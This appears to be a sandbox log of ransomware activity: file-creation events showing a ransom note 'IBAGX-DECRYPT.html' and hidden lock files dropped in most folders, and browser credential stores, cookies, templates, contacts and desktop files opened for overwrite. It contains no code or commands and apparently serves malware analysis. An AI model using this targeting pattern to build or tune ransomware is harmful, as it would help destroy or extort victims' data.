Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Speech\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\My\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\My\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Templates\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Templates\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Templates\Normal.dotm desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Templates\NormalEmail.dotm desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\UProof\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\UProof\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Word\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Word\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Word\STARTUP\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Microsoft\Word\STARTUP\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\mkuwVg_9_85.csv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Extensions\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Extensions\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Crash Reports\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Crash Reports\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Crash Reports\InstallTime20131025151332 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\addons.json desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\bookmarkbackups\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\bookmarkbackups\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\bookmarkbackups\bookmarks-2017-05-31_5.json desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\bookmarkbackups\bookmarks-2017-07-12_5.json desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cert8.db desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\compatibility.ini desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\content-prefs.sqlite desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\cookies.sqlite desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\downloads.sqlite desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\extensions.ini desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\extensions.sqlite desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\healthreport\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\healthreport\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\healthreport.sqlite desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\indexedDB\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\indexedDB\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\indexedDB\moz-safe-about+home\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\indexedDB\moz-safe-about+home\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\indexedDB\moz-safe-about+home\idb\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\indexedDB\moz-safe-about+home\idb\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\indexedDB\moz-safe-about+home\idb\818200132aebmoouht.sqlite desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\key3.db desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\localstore.rdf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\marionette.log desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\mimeTypes.rdf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\minidumps\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\minidumps\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\permissions.sqlite desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\places.sqlite desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\pluginreg.dat desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\prefs.js desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\search.json desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\secmod.db desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\sessionstore.bak desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\sessionstore.js desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\signons.sqlite desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\times.json desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\urlclassifierkey3.txt desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\webapps\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\webapps\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\webapps\webapps.json desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\Profiles\h231daer.default\webappsstore.sqlite desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Mozilla\Firefox\profiles.ini desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\neRXu5W1eg3y OKCcvRv.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Ni59WhMAyCR0XMs.swf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\otN-.wav desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\PXz5XXpR.doc desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\qCC6mI5WZM3RY.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\RQOxouJFh.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\tktu22R-b1SHP8kj.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\UiO1wT5wrfOaDEHA.csv desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\vrXyp.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\vyDzPY.avi desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\ybXOoHI.odp desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\Ylbk7NKyuQCHx8-9.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\z5AcyaMPE1VuXrO.bmp desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\_FBLDC8.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\AppData\Roaming\_rz--U_afHNhCzNIUSv_.mp4 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Application Data\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE False 1
Fn
Create C:\Users\EEBsYm5\Application Data\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Contacts\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Contacts\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Contacts\Administrator.contact desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Contacts\ihnvbh euuncnh.contact desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Contacts\lodkd auftnm.contact desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Contacts\mneuc uhnfghgg.contact desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Contacts\ofhbnh edferrr.contact desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Contacts\uosjfl sidvllie.contact desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Cookies\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Cookies\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Desktop\\IBAGX-DECRYPT.html desired_access = GENERIC_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Desktop\90c08d8190c08a69610.lock desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_HIDDEN, FILE_FLAG_DELETE_ON_CLOSE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\EEBsYm5\Desktop\-86NJ3BFPDGrZFF.png desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\5rRQ_i9lb.swf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\7jqDJu1dj.bmp desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\8h1goTpD.m4a desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\8PPNtAf0-.mp3 desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
Create C:\Users\EEBsYm5\Desktop\a9AoUj5.swf desired_access = DELETE, GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, FILE_FLAG_WRITE_THROUGH True 1
Fn
